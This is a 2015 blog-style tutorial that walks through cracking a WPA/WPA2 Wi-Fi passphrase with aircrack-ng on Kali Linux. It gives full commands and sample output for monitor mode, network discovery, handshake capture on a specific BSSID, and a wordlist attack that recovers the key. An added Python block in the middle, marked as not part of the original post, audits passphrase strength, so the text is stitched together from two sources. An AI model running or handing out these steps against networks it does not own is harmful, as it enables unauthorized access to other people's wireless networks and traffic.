Monday, 22 June 2015

Hack WPA/WPA2 Wi-Fi with aircrack-ng in Kali Linux.


In this tutorial, we use 'aircrack-ng' in Kali Linux to crack the passphrase of a WPA Wi-Fi network.

Perform the following steps on the Kali Linux machine.

1) Disconnect from all wireless networks.

2) Verify that your wireless card supports monitor mode.
root@kali:~# airmon-ng

Interface    Chipset        Driver

wlan0        Atheros AR9285    ath9k - [phy0]

If your wireless card is not listed above, then it does not support monitor mode and you cannot continue. 

3) Enable Monitor mode
root@kali:~# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID    Name
2550    NetworkManager
2658    wpa_supplicant


Interface    Chipset        Driver

wlan0        Atheros AR9285    ath9k - [phy0]
                (monitor mode enabled on mon0)

Note the name of the new monitor interface, mon0.

4) Bring the wlan0 interface down so that the wireless card stays disconnected from the internet and is left to monitor mode.
root@kali:~# ifconfig wlan0 down

5) List all the wireless networks in range.
root@kali:~# airodump-ng mon0
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 54:B8:0A:89:76:4E  -33       16       10    4   1  54e  WPA  TKIP   PSK  SHABBIR
 94:D7:23:0C:09:20  -77       20       51    0  11  54e  WPA  CCMP   PSK  MTNL
 9C:D6:43:CC:04:B8  -80       11        0    0   2  54e. WPA2 CCMP   PSK  dlink
 10:7B:EF:A6:26:80  -80        3        0    0  11  54e  WPA2 CCMP   PSK  TATA

Locate your network, press Ctrl+C to stop the process, and note down its BSSID and CH (channel).


6) Monitor only the target network and wait for a device to connect to the network and then capture the four-way handshake.
root@kali:~# airodump-ng -c 1 --bssid 54:B8:0A:89:76:4E -w Desktop/wpa mon0

Where,
-c 1 -> channel of network is 1 (as seen in the previous output)
--bssid 54:B8:0A:89:76:4E -> BSSID copied from the previous output (The MAC address of the Access Point).
-w Desktop/wpa -> file name where the handshake will be saved.
mon0 -> the monitor interface


7) What we are really doing now is waiting for a device to connect to the network, so that we can capture the four-way handshake which we need in order to crack the password. Also, four files will show up on your desktop. This is where the handshake will be saved.

When a device connects to the network, the message "WPA handshake: 54:B8:0A:89:76:4E" appears on the airodump screen, as shown below:

 CH  1 ][ Elapsed: 32 s ][ 2015-06-22 09:56 ][ WPA handshake: 54:B8:0A:89:76:4E

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 54:B8:0A:89:76:4E  -29   1      314        6    0   1  54e  WPA  TKIP   PSK  SHABBIR

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 54:B8:0A:89:76:4E  0C:EE:E6:C0:37:43  -26    1e-54      0        9


The handshake has been captured. Press Ctrl+C on the airodump terminal to stop monitoring the network.

8) Launch the password cracking process. It will only succeed if the password happens to be in the wordlist that you have selected.
root@kali:~# aircrack-ng -a2 -b 54:B8:0A:89:76:4E -w /usr/share/wordlists/fern-wifi/common.txt Desktop/*.cap

Opening Desktop/wpa-04.cap
Reading packets, please wait...

                                 Aircrack-ng 1.2 beta3


                   [00:00:00] 4 keys tested (254.57 k/s)


                         KEY FOUND! [ goodadmin ]


      Master Key     : 9A CD 12 5D 29 22 11 C7 6A 3D 75 0D 9D A7 76 C1
                       F1 2A 9B 9A 57 DD A9 EA 11 26 B0 EB 40 09 1E EB

      Transient Key  : 5A 15 F5 AD 5A F6 1F 00 78 F5 5F 0F 87 46 8C 81
                       DA 1F B4 8B 7C B2 C9 24 4B 63 6D EF 64 88 30 67
                       66 E4 5E 30 5E 4C C1 E1 F5 47 8A 7F AE F0 A6 FB
                       BF 7B 9E A6 AB ED B6 1B 43 15 43 D1 EF 6E C2 49

      EAPOL HMAC     : 79 56 57 C1 85 7D D8 A4 CD 89 B3 34 A5 36 D0 77


Where,
-a is the attack mode used to crack the handshake; 2 = WPA/WPA2-PSK
-b is the BSSID of the target access point
-w is the path to the wordlist
Desktop/*.cap is the path to the .cap file(s) containing the captured handshake.
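Because step 8 only succeeds when the passphrase is in the wordlist, the check worth running on your own access point is whether its passphrase would survive one. The following is an added example, not part of the original post: it derives the WPA/WPA2-PSK master key the way the standard defines it (PBKDF2-HMAC-SHA1 salted with the ESSID) and audits a passphrase against a wordlist. The wordlist entries and the guess rate are constructed assumptions.

```python
import hashlib
import math
import string

# Constructed sample wordlist (assumption); in practice load the file you audit against.
CONSTRUCTED_WORDLIST = ["password", "12345678", "goodadmin", "letmein123"]

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=ESSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def charset_size(passphrase: str) -> int:
    """Size of the union of character classes the passphrase draws from."""
    classes = [string.ascii_lowercase, string.ascii_uppercase,
               string.digits, string.punctuation + " "]
    return sum(len(c) for c in classes if any(ch in c for ch in passphrase))

def audit_passphrase(passphrase: str, wordlist, guesses_per_second: float) -> dict:
    """Report whether a passphrase is a valid WPA PSK and how it fares offline."""
    words = {w.strip() for w in wordlist}
    size = charset_size(passphrase)
    # Upper bound only: assumes every character was picked uniformly at random.
    bits = len(passphrase) * math.log2(size) if size else 0.0
    return {
        "valid_length": 8 <= len(passphrase) <= 63,   # WPA passphrase limits
        "in_wordlist": passphrase in words,            # falls on the first pass
        "max_entropy_bits": round(bits, 1),
        "years_to_exhaust": 2 ** bits / guesses_per_second / (365 * 24 * 3600),
    }

if __name__ == "__main__":
    # Same passphrase, different ESSID -> different PMK, so precomputed
    # tables only apply to the ESSID they were built for.
    print(wpa_pmk("goodadmin", "SHABBIR").hex())
    print(wpa_pmk("goodadmin", "dlink").hex())
    for candidate in ("goodadmin", "T7#vq9Lm!2xRz@4kWp8e"):
        print(candidate, audit_passphrase(candidate, CONSTRUCTED_WORDLIST, 250.0))
```

A passphrase flagged `in_wordlist` offers no protection once a handshake has been captured, whatever its length; a long random passphrase and an uncommon ESSID are what make the offline search impractical.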


9) After completing the hack, disable mon0 and enable wlan0 so that you can connect to the Internet again.

root@kali:~# ifconfig mon0 down
root@kali:~# ifconfig wlan0 up





 
